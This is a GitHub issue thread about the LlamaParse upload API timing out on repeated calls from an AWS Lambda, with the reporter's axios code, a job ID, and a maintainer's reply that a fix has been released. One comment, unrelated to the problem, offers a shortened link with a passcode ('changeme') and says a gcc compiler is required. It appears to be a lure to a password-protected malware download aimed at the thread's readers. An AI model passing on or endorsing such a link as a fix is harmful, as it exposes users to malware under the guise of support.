### ISSUE TITLE
upload api timesout when sending second request from same lambda

### ISSUE THREAD

**Issue by imukulmunjal** [run-llama/llama_parse#379]
upload api timesout when sending second request from same lambda

When processing multiple files I am using aws lambda to call https://api.cloud.llamaindex.ai/api/parsing/upload api and on every second request I get timeout error

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by BinaryBrain** [comment]
Hi @imukulmunjal,
This is quite strange. Can you share your code so we can reproduce the issue?

**Comment by imukulmunjal** [comment]
```
`const axiosLlamaConfig = {
      method: 'post',
      timeout: 50000,
      maxBodyLength: Infinity,
      url: 'https://api.cloud.llamaindex.ai/api/parsing/upload',
      headers: {
        accept: 'application/json',
        Authorization: `Bearer ${llamaCloudApiKey}`,
        ...data.getHeaders(),
      },
      data,
    };
    const fileReadResponse = await axios.request(axiosLlamaConfig);`
    
    
    
```

I am using this to upload document.

Error - You can see first run it worked fine and finished execution after 2057ms and second run with same pdf it gave timeout and this is happening everytime
<img width="1173" alt="Screenshot 2024-09-06 at 10 57 40 AM" src="https://github.com/user-attachments/assets/beebac49-e7a0-4951-97d1-b163b9d95081">

**Comment by BinaryBrain** [comment]
Can you give me the JobID of the 1st job that's successful and the 2nd one that's failing?
It would help me to debug it.

**Comment by imukulmunjal** [comment]
Job Id - 6c87634f-defc-4d30-a87e-a7123bf331ff

This is the job if which passed and after this there was timeout error

**Comment by imukulmunjal** [comment]
@BinaryBrain let me know if you need anything else, thanks

**Comment by BinaryBrain** [comment]
Hi, we just released a fix that may help with your issue.
Can you retry and tell me if everything's working now?
